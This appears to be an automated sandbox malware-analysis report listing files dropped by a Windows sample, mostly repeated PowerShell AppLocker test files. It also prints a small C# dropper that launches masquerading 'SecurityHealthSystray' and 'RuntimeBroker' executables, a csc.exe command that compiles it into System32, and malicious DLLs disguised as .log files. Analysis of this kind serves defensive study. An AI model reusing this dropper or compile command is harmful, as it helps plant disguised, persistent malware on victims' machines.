                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atmsnfiy.htd.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyjaxmcn.cjh.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gavpkimw.kus.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icz2c5sv.wks.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5bnme2a.ejc.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krap5mnx.gky.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m33xkesk.p0s.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2hqm0lh.2fe.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owepzlbv.y3m.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4ayb1f0.ifw.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slr030xd.z4f.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szvvzm30.lad.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhdrgxrx.nvv.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vi3knmna.0so.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vkkhqpqd.e4s.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2v5ewkx.5mh.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xag2mn3e.1mq.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxc2lxln.nr5.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yme5wg2p.zim.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                    Category:dropped
                                                                                    Size (bytes):414
                                                                                    Entropy (8bit):4.974922029674802
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMKP0S3iFkD:JNVQIbSfhV7TiFkMSfhWLSMW0SSFkD
                                                                                    MD5:A62F958180D5F17202AEBB8F994F5E49
                                                                                    SHA1:18D3402548B4286D42F74E65E5D2E399D5434653
                                                                                    SHA-256:0752F8BC3FA3272F1B38930BA859A338F2309D070D3626145B9B1F4E35B0DF99
                                                                                    SHA-512:ACCDD8076C3224460F4B99441942AF502CFC6E8FDF5BC866B77F9CDCCC5B4E1C6C60239D713F4427732F27640E7839BC531C01B8ED03EB5FE4295408F87C79A7
                                                                                    Malicious:false
                                                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"); } catch { } }).Start();. }.}.

                                                                                    C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):250
                                                                                    Entropy (8bit):5.011117393301097
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fF0s9n:Hu7L//TRq79cQWfdD
                                                                                    MD5:D0ED8693FA323D4A854F74597F76C1E5
                                                                                    SHA1:BDFB8C2ED4A498B417B459AC4718F58E4204CF90
                                                                                    SHA-256:B269BC5ED3C72F31BBB1226F4CC642306B78DD31D7C0BA349144BCE261C9262A
                                                                                    SHA-512:EBAF4E42EE741A2F536B1122EAA42A0AB19FAFA56F369177523A1585C4B0D1ADE1DB2EB0B3FA00D1A3A0387E972106EC798A59ECAC65B773ED13FE72C7AB8ABA
                                                                                    Malicious:true
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs"

                                                                                    C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.out

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):750
                                                                                    Entropy (8bit):5.230430957019079
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfdiKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfdiKax5DqBVKVrdFAw
                                                                                    MD5:8B9E227BA9469DC0B6D24667D1476255
                                                                                    SHA1:C3C8B9AE2F73A0FF8AE0DCB66F9656ABF65658EA
                                                                                    SHA-256:3110A96D2D8298E7860EF210A14E6544761AC37FD8EABB551FE99DBD11980544
                                                                                    SHA-512:03B9F9EC3ADC890893A5C72FA2717CE41069CDAA6691ACA580E260B26C9F89CB12EC3EB4A56159D9CF5A855A41ECD28AB55EFBB40F25210B37770DDECDB72243
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                    C:\Users\user\Desktop\4e8fdf03a6a278

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with very long lines (904), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):904
                                                                                    Entropy (8bit):5.91725409161719
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IG94wL4jL2b+BASGcATxOgUCuGMaQHc7nqB1f1v1tw6J/:IG94z2b+BhD1nGMaqcGrdNB
                                                                                    MD5:ABF6FA81156E57413B7EABD0688B37E4
                                                                                    SHA1:17C4D49DE2F16A6E3F0AF1E267280D795F3DD3C8
                                                                                    SHA-256:6A8BE8EBB25EC12D7F56903B2EF88153A71FE8F72E3A043DAF0834F201573891
                                                                                    SHA-512:7ACBDA378034FF11B21B3CB57B81F50CD1FA986D30EC316C88A272E119BC1EE42B13213DD1AA2DDB39CAF89C12F1B19475570AB152E0F10776F99D21188EFB39
                                                                                    Malicious:false
                                                                                    Preview:jLDC7HtutmeN9JZ14Z4kwbnvMfTH98NULH7hZg3igX7vW6c8cZ7ThjHHiR0byluvZKB2M1bYgVEYe1ZPDUpkB4wm9z9Hqbu5mMWM4kwk7ixLftnr2kYd6KteYZ2W2TsElIvSeNUdhEmcGkHPMRPGDQ8bc1xfrZsn0skW8UMpP552hRYxRnKlElBUKTzmZzvIV9lXAuR1Fk1HUG4LdANDPHiPrPMofjPZJxgipAxgVSfeu3ADZoJYlr3OaWquinWfUb8gkVfdNrr6lEexPIO0a1yb4RHTTC7s6AJT5ddDIpL496nW22faYfFdmgmSOMKLt99k5K2voKrup4b7nvaaghUa5pqY0Lz6fAKA7CbrAtwNyUxrFoodvtoLoipPee5cVvOptaAlUtawuHmk29SLgVKwV9WYXLNgyT1CFI8ooDJCT1ah5EWeLt69kcUuElNIg48bPjfuAohdMIcdiycTysUFX1cmyNjC0BfZ39SWjmegLcxc90MQJ4Tyj2EXH26xEenLmDkjgGtMOx34E9m7BT35rr0A44Oqqqcrzmz6PmtCKHkv9KSIP8vvlrd4Njol2DfhVMEcJqsYk0vkHEBulGas5qGIJ5sq8HKHlCZwF08jQWKu62xIi39wmwmpG6SO8Cacqo8EpOpvH1cifVMQIjHEHYezauqIitkN6sER3sdTOOouUDJuuCGY4WURJJo5hgMYQOmxR4WZGyz3uueWl6XgnMTjXwIuDivrBQdGbVd0pqRGgbhZoRUlIquE4CZevmWiCH1dQY5Pch064ND6PsFwNKjUfZLY69ECUtDYjDJQVEIl0yJr9cPDgkU1ig81NgTdcymLJoWLjzaJB7erQeZdtBfuZM0DFRDzvoICM8hVGEdrJLzlBQltHzuaS1v7yTFRwlXX

                                                                                    C:\Users\user\Desktop\AsBtWtog.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 4si9noTBNw.exe, Detection: malicious, Browse
                                                                                    • Filename: FToZAUe1tw.exe, Detection: malicious, Browse
                                                                                    • Filename: fnNUIS1KeW.exe, Detection: malicious, Browse
                                                                                    • Filename: kqq1aAcVUQ.exe, Detection: malicious, Browse
                                                                                    • Filename: Qsi7IgkrWa.exe, Detection: malicious, Browse
                                                                                    • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                                                                    • Filename: 4Awb1u1GcJ.exe, Detection: malicious, Browse
                                                                                    • Filename: LzmJLVB41K.exe, Detection: malicious, Browse
                                                                                    • Filename: s5duotgoYD.exe, Detection: malicious, Browse
                                                                                    • Filename: QMT2731i8k.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\EDQjSEMY.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
